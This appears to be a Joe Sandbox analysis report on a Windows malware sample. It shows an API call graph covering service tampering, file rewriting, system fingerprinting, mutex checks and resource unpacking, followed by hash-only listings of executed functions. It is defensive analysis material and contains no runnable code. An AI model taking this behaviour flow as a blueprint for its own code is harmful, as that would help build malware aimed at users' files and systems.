                                                                                                                                                                                                                                                                                                                                                      execution_graph 41686 6c520c 41689 6ecbd0 41686->41689 41688 6c5211 41690 6ebe50 _wcslen 41689->41690 41690->41688 41690->41689 41691 6ec168 41690->41691 41694 6ec78e CloseServiceHandle 41690->41694 41695 6ebffd StrStrIW 41690->41695 41696 6ebfe9 41690->41696 41697 6ec706 StrStrIW 41690->41697 41699 6ebf68 StrStrIW 41690->41699 41700 6ec72b StrStrIW 41690->41700 41701 6ec399 StrStrIW 41690->41701 41703 6ec0fd CloseServiceHandle 41690->41703 41704 6ec7e4 StartServiceW 41690->41704 41707 6ebf7e 41690->41707 41708 6ec65a ChangeServiceConfigW 41690->41708 41709 6cce90 41690->41709 41727 6ea350 CloseServiceHandle 41690->41727 41729 6c5d20 41690->41729 41728 6ea905 LocalFree 41691->41728 41694->41690 41695->41690 41696->41688 41697->41690 41699->41690 41700->41690 41701->41690 41705 6ec3a9 41701->41705 41703->41690 41704->41690 41705->41688 41706 6ec36b OpenServiceW 41706->41690 41707->41704 41707->41706 41708->41690 41708->41696 41718 6ccc9b _wcslen 41709->41718 41710 6cd729 GetFileSizeEx 41713 6cd8a1 CloseHandle 41710->41713 41710->41718 41711 6cd426 41711->41713 41714 6cd42a CloseHandle 41711->41714 41712 6cd5c5 CreateFileW 41712->41718 41713->41718 41714->41718 41716 6ccd5c lstrcmpiW 41716->41718 41717 6ccca0 lstrcmpiW 41717->41718 41718->41690 41718->41709 41718->41710 41718->41711 41718->41712 41718->41713 41718->41714 41718->41716 41718->41717 41719 6cd049 SetFilePointerEx 41718->41719 41721 6c5d20 VirtualAlloc VirtualFree 41718->41721 41722 6cd378 CloseHandle 41718->41722 41723 6ccfbb GetFileTime 41718->41723 41724 6ccc92 41718->41724 41726 6cd903 41718->41726 41734 6c8937 VirtualAlloc VirtualFree 41718->41734 41735 6c8470 VirtualAlloc VirtualFree 41718->41735 41719->41718 41721->41718 41722->41718 41723->41718 41724->41690 41725 6ffdfc 40 API calls 41725->41726 41726->41724 41726->41725 41727->41690 41728->41696 41731 6c5d22 41729->41731 41730 6c5d39 VirtualAlloc 41730->41731 41731->41690 41731->41730 41733 6c5d46 VirtualFree 41731->41733 41733->41690 41734->41718 41735->41718 41736 2ac9308 41737 2ac9348 CloseHandle 41736->41737 41739 2ac9379 41737->41739 41740 6c5085 41741 6c506f 41740->41741 41742 6c5089 41740->41742 41745 6e8550 41741->41745 41744 6c5078 41764 6e8556 41745->41764 41746 6e8145 GetLastError 41769 6e7dd7 41746->41769 41747 6e8bc1 GetLastError 41747->41764 41748 6e8986 SetEntriesInAclW 41748->41764 41749 6e8209 GetUserNameW 41766 6e7d37 41749->41766 41749->41769 41750 6e83fb GetUserNameW 41750->41769 41751 6e89cd OpenMutexW 41751->41744 41752 6e8248 41754 6e824a GetLastError 41752->41754 41756 6e8250 41754->41756 41755 6e7d6c GetVolumeInformationW 41755->41744 41756->41744 41757 6e836e GetLastError 41757->41769 41758 6e8599 41761 6e7d30 41758->41761 41763 6e896a wsprintfW 41758->41763 41759 6e7d20 41759->41755 41760 6e7d83 GetWindowsDirectoryW 41759->41760 41759->41761 41759->41766 41767 6e7e06 GetComputerNameW 41759->41767 41760->41761 41760->41766 41761->41755 41761->41766 41762 6e7fd4 GetLastError 41762->41769 41763->41761 41764->41745 41764->41746 41764->41747 41764->41748 41764->41751 41764->41758 41764->41759 41764->41761 41764->41763 41765 6e8953 AllocateAndInitializeSid 41764->41765 41764->41766 41768 6e890b LocalFree 41764->41768 41764->41769 41765->41764 41766->41744 41767->41766 41768->41764 41769->41746 41769->41749 41769->41750 41769->41752 41769->41754 41769->41755 41769->41757 41769->41759 41769->41761 41769->41762 41769->41766 41770 6e7f6b GetVolumeInformationW 41769->41770 41770->41769 41771 5abfda0 41774 5abfdd8 41771->41774 41772 5abfdae 41775 5abfe0d 41774->41775 41776 5abfde5 41774->41776 41779 5abe11c 41775->41779 41776->41772 41780 5abfeb0 GlobalMemoryStatusEx 41779->41780 41782 5abfe2a 41780->41782 41782->41772 41783 6cb180 41792 6cb0de 41783->41792 41784 6cb2a7 SetFilePointerEx 41786 6cb1df 41784->41786 41788 6cb1c6 41784->41788 41785 6cb196 41787 6cb3a6 41785->41787 41785->41788 41789 6cb328 SetFilePointerEx 41787->41789 41790 6cb3b2 41787->41790 41788->41786 41791 6cb2e0 WriteFile 41788->41791 41792->41783 41792->41784 41792->41785 41792->41789 41793 6cb0d0 SetFilePointerEx 41792->41793 41794 6cb253 41792->41794 41793->41792 41795 6cb054 41793->41795 41801 2ac0890 41802 2ac08b1 41801->41802 41803 2ac097a 41802->41803 41806 2ac4acf 41802->41806 41809 2ac3d8a 41802->41809 41812 2ac9080 41806->41812 41811 2ac9080 VirtualProtect 41809->41811 41810 2ac3da6 41811->41810 41814 2ac9093 41812->41814 41816 2ac9130 41814->41816 41817 2ac9178 VirtualProtect 41816->41817 41819 2ac4af1 41817->41819 41820 6caaf0 41821 6cab06 41820->41821 41825 6cab57 41821->41825 41826 6c6490 41821->41826 41827 6c5f10 41826->41827 41829 6c5d90 41826->41829 41828 6c6084 SetFilePointerEx 41827->41828 41827->41829 41828->41827 41830 6ffaf0 41829->41830 41831 6ffafd 41830->41831 41832 6ffb84 41830->41832 41831->41832 41833 6ffb2a 41831->41833 41837 6ffc05 41832->41837 41840 6ffbda 41832->41840 41836 70032f 41833->41836 41849 701a1b 21 API calls 2 library calls 41833->41849 41835 7008d6 41835->41825 41836->41825 41841 6ffc38 41837->41841 41848 700fe0 21 API calls __startOneArgErrorHandling 41837->41848 41839 6ffc22 41839->41825 41840->41841 41842 701167 41840->41842 41843 70116e 41840->41843 41841->41825 41850 700ff7 21 API calls __startOneArgErrorHandling 41842->41850 41851 700fe0 21 API calls __startOneArgErrorHandling 41843->41851 41846 70116c 41846->41825 41847 701173 41847->41825 41848->41839 41849->41835 41850->41846 41851->41847 41852 40cbdd 41853 40cbe9 41852->41853 41896 40d534 HeapCreate 41853->41896 41856 40cc46 41957 41087e 71 API calls 8 library calls 41856->41957 41859 40cc4c 41860 40cc50 41859->41860 41861 40cc58 __RTC_Initialize 41859->41861 41958 40cbb4 62 API calls 3 library calls 41860->41958 41898 411a15 67 API calls 2 library calls 41861->41898 41863 40cc57 41863->41861 41865 40cc66 41866 40cc72 GetCommandLineA 41865->41866 41867 40cc6a 41865->41867 41899 412892 71 API calls 3 library calls 41866->41899 41959 40e79a 62 API calls 3 library calls 41867->41959 41870 40cc71 41870->41866 41871 40cc82 41960 4127d7 82 API calls 3 library calls 41871->41960 41873 40cc8c 41874 40cc90 41873->41874 41875 40cc98 41873->41875 41961 40e79a 62 API calls 3 library calls 41874->41961 41900 41255f 81 API calls 6 library calls 41875->41900 41878 40cc97 41878->41875 41879 40cc9d 41880 40cca1 41879->41880 41881 40cca9 41879->41881 41962 40e79a 62 API calls 3 library calls 41880->41962 41901 40e859 73 API calls 5 library calls 41881->41901 41884 40cca8 41884->41881 41885 40ccb0 41886 40ccb5 41885->41886 41887 40ccbc 41885->41887 41963 40e79a 62 API calls 3 library calls 41886->41963 41902 4019f0 OleInitialize 41887->41902 41890 40ccd8 41892 40ccea 41890->41892 41964 40ea0a 62 API calls _doexit 41890->41964 41891 40ccbb 41891->41887 41965 40ea36 62 API calls _doexit 41892->41965 41895 40ccef __getstream 41897 40cc3a 41896->41897 41897->41856 41956 40cbb4 62 API calls 3 library calls 41897->41956 41898->41865 41899->41871 41900->41879 41901->41885 41903 401ab9 41902->41903 41966 40b99e 41903->41966 41905 401abf 41906 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 41905->41906 41933 402467 41905->41933 41907 401dc3 CloseHandle GetModuleHandleA 41906->41907 41915 401c55 41906->41915 41979 401650 41907->41979 41909 401e8b FindResourceA LoadResource LockResource SizeofResource 41981 40b84d 41909->41981 41913 401c9c CloseHandle 41913->41890 41914 401ecb _memset 41916 401efc SizeofResource 41914->41916 41915->41913 41919 401cf9 Module32Next 41915->41919 41917 401f1c 41916->41917 41918 401f5f 41916->41918 41917->41918 42037 401560 __VEC_memcpy __cftoe2_l 41917->42037 41921 401f92 _memset 41918->41921 42038 401560 __VEC_memcpy __cftoe2_l 41918->42038 41919->41907 41927 401d0f 41919->41927 41923 401fa2 FreeResource 41921->41923 41924 40b84d _malloc 62 API calls 41923->41924 41925 401fbb SizeofResource 41924->41925 41926 401fe5 _memset 41925->41926 41928 4020aa LoadLibraryA 41926->41928 41927->41913 41931 401dad Module32Next 41927->41931 41929 401650 41928->41929 41930 40216c GetProcAddress 41929->41930 41932 4021aa 41930->41932 41930->41933 41931->41907 41931->41927 41932->41933 42011 4018f0 41932->42011 41933->41890 41935 40243f 41935->41933 42039 40b6b5 62 API calls 2 library calls 41935->42039 41937 4021f1 41937->41935 42023 401870 41937->42023 41939 402269 VariantInit 41940 401870 75 API calls 41939->41940 41941 40228b VariantInit 41940->41941 41942 4022a7 41941->41942 41943 4022d9 SafeArrayCreate SafeArrayAccessData 41942->41943 42028 40b350 41943->42028 41946 40232c 41947 402354 SafeArrayDestroy 41946->41947 41955 40235b 41946->41955 41947->41955 41948 402392 SafeArrayCreateVector 41949 4023a4 41948->41949 41950 4023bc VariantClear VariantClear 41949->41950 42030 4019a0 41950->42030 41953 40242e 41954 4019a0 65 API calls 41953->41954 41954->41935 41955->41948 41956->41856 41957->41859 41958->41863 41959->41870 41960->41873 41961->41878 41962->41884 41963->41891 41964->41892 41965->41895 41969 40b9aa _strnlen __getstream 41966->41969 41967 40b9b8 42040 40bfc1 62 API calls __getptd_noexit 41967->42040 41969->41967 41971 40b9ec 41969->41971 41970 40b9bd 42041 40e744 6 API calls 2 library calls 41970->42041 42042 40d6e0 62 API calls 2 library calls 41971->42042 41974 40b9f3 42043 40b917 103 API calls 3 library calls 41974->42043 41976 40b9ff 42044 40ba18 LeaveCriticalSection _doexit 41976->42044 41977 40b9cd __getstream 41977->41905 41980 4017cc ___crtGetEnvironmentStringsA 41979->41980 41980->41909 41982 40b900 41981->41982 41993 40b85f 41981->41993 42052 40d2e3 6 API calls __decode_pointer 41982->42052 41984 40b906 42053 40bfc1 62 API calls __getptd_noexit 41984->42053 41987 401ebf 41999 40af66 41987->41999 41990 40b870 41990->41993 42045 40ec4d 62 API calls 2 library calls 41990->42045 42046 40eaa2 62 API calls 7 library calls 41990->42046 42047 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 41990->42047 41991 40b8bc RtlAllocateHeap 41991->41993 41993->41987 41993->41990 41993->41991 41994 40b8ec 41993->41994 41997 40b8f1 41993->41997 42048 40b7fe 62 API calls 4 library calls 41993->42048 42049 40d2e3 6 API calls __decode_pointer 41993->42049 42050 40bfc1 62 API calls __getptd_noexit 41994->42050 42051 40bfc1 62 API calls __getptd_noexit 41997->42051 42001 40af70 41999->42001 42000 40b84d _malloc 62 API calls 42000->42001 42001->42000 42002 40af8a 42001->42002 42005 40af8c std::bad_alloc::bad_alloc 42001->42005 42054 40d2e3 6 API calls __decode_pointer 42001->42054 42002->41914 42009 40afb2 42005->42009 42055 40d2bd 73 API calls __cinit 42005->42055 42006 40afbc 42057 40cd39 RaiseException 42006->42057 42056 40af49 62 API calls std::exception::exception 42009->42056 42010 40afca 42012 401903 lstrlenA 42011->42012 42013 4018fc 42011->42013 42058 4017e0 72 API calls 3 library calls 42012->42058 42013->41937 42015 40191f MultiByteToWideChar 42016 401940 GetLastError 42015->42016 42017 401996 42015->42017 42018 40194b MultiByteToWideChar 42016->42018 42019 40198d 42016->42019 42017->41937 42059 4017e0 72 API calls 3 library calls 42018->42059 42019->42017 42060 401030 GetLastError 42019->42060 42021 401970 MultiByteToWideChar 42021->42019 42024 40af66 74 API calls 42023->42024 42025 40187c 42024->42025 42026 401885 SysAllocString 42025->42026 42027 4018a4 42025->42027 42026->42027 42027->41939 42029 40231a SafeArrayUnaccessData 42028->42029 42029->41946 42031 4019aa InterlockedDecrement 42030->42031 42032 4019df VariantClear 42030->42032 42031->42032 42033 4019b8 42031->42033 42032->41953 42033->42032 42034 4019c2 SysFreeString 42033->42034 42035 4019c9 42033->42035 42034->42035 42061 40aec0 63 API calls 2 library calls 42035->42061 42037->41917 42038->41921 42039->41933 42040->41970 42042->41974 42043->41976 42044->41977 42045->41990 42046->41990 42048->41993 42049->41993 42050->41997 42051->41987 42052->41984 42053->41987 42054->42001 42055->42009 42056->42006 42057->42010 42058->42015 42059->42021 42061->42032 41796 6c7b23 41797 6c7b2b 41796->41797 41799 6c5f10 41796->41799 41798 6c6084 SetFilePointerEx 41798->41799 41799->41798 41800 6c5d90 41799->41800

                                                                                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                                                                                      Function 0643A500 Relevance: 2.9, Instructions: 2885COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a7e6ed6b4786d7b44f4ab75095f805b8ad6778daebed3c6ee1d71b6bb8a6404a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 396b34427ee56aa5f3ae0717c993c4ef8a757b8794fe47a53cd0770da622cbfb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e6ed6b4786d7b44f4ab75095f805b8ad6778daebed3c6ee1d71b6bb8a6404a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0263FA31D10B198ADB51EF68C8846A9F7B1FF99300F15D79AE45877221EB70AAC4CF81
                                                                                                                                                                                                                                                                                                                                                      Function 064317F8 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9a3670aec31aeafcf2a67df41a2ff45c89dc86224f3e5adc77c00e87e881bc7f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 683c5f65574d333523e7fd8f2e79c79a256d9d1af39d3f97e2f64fe32d163767
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a3670aec31aeafcf2a67df41a2ff45c89dc86224f3e5adc77c00e87e881bc7f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21B16E70E00259CFDF54CFA9C8817AEBBF2BF88314F14852AD415AB394EB749845CB81
                                                                                                                                                                                                                                                                                                                                                      Function 064364C8 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 38763df0ad68e08f8cfa7d4278859de204842cf00948be19706d964a4f17a1a4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5e27fa56e5df73a8d689ec9ee0527c6b2ccccdde7c966c276826cb85a269a105
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38763df0ad68e08f8cfa7d4278859de204842cf00948be19706d964a4f17a1a4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0028E34B116109BCBAA7B78A46823D36E3EBCE761B25156ED503CB380CE39DC479B41
                                                                                                                                                                                                                                                                                                                                                      Function 064317EC Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a9f6b0ada4b9df8c80079894d9f788e5114264c4ce006c9b1de35d56d053c38a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5c7057c353aaae81e0d40734fb819cbde4c22d3e68f78ec1512de79b8d7f1b9f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9f6b0ada4b9df8c80079894d9f788e5114264c4ce006c9b1de35d56d053c38a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17A17C70E00269CFDF54CFA8D9817AEBBF1BF48314F14852AD815AB394EB749885CB81
                                                                                                                                                                                                                                                                                                                                                      Function 0643A250 Relevance: .2, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 86e280bb8b58cc72f804eafc56f1cedd58f17722355fee10043192e741d1359a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 54ac866726296a9d1c59a0e20b1359439cf3e8d988fe61790db41a681115aeeb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86e280bb8b58cc72f804eafc56f1cedd58f17722355fee10043192e741d1359a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF819D71A402148FDB44DF69D884B9EBBF6FF88310F14C16AE909AB395DB70D845CB90
                                                                                                                                                                                                                                                                                                                                                      Function 06431564 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5beb479d3ffe6987b638829e0f62d109823fddb65736a0a73ef13646be304286
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cac288bf0a897f722efaf261c922a463cf360532b588a5cc3bb3168d985c83e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5beb479d3ffe6987b638829e0f62d109823fddb65736a0a73ef13646be304286
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D715A70E002599FDF50DFA9C985B9EBBF2BF48314F18812AE815A7354DB749842CF91
                                                                                                                                                                                                                                                                                                                                                      Function 06431570 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 626dc4363cc1e4d92e9758b7a6827e3eb251b65386264678e67000b03b532e12
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d0d58ff97835f4687415d2c717455bdc87efc4640a6750e02aa92019fe7cce82
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 626dc4363cc1e4d92e9758b7a6827e3eb251b65386264678e67000b03b532e12
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA715A70E002599FDF50DFA9C984BEEBBF2BF88314F18812AD415A7354EB749842CB91
                                                                                                                                                                                                                                                                                                                                                      Function 064335B8 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 42a53405ce1a2770a7f46ec01f34540fa4299e48640ffeaef79400498f8daa03
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b5c148ffb8aa4f552a4857dbfcd9cabc67660921915c7d42f17896eaa0a00060
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42a53405ce1a2770a7f46ec01f34540fa4299e48640ffeaef79400498f8daa03
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91319C357401254FDB0AAB3AD564A2E7AB7EFC8650710816AE506CB3A8EF24DC068FC1
                                                                                                                                                                                                                                                                                                                                                      Function 0643A240 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.1783619720.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_6430000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 726f4e3c164c6b05077fe65cfbad1edc48db3a943247ebf7f68c538ca1f3345d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: af226cd1c3ed7bc1eeb8d605ed8ec7c41b8dae75dc875ee09734637835dc41b7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 726f4e3c164c6b05077fe65cfbad1edc48db3a943247ebf7f68c538ca1f3345d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711CE31A002048FDB15EFA5D944B8BBB66AF88710F14C564C8481B386EBB4E886CBE1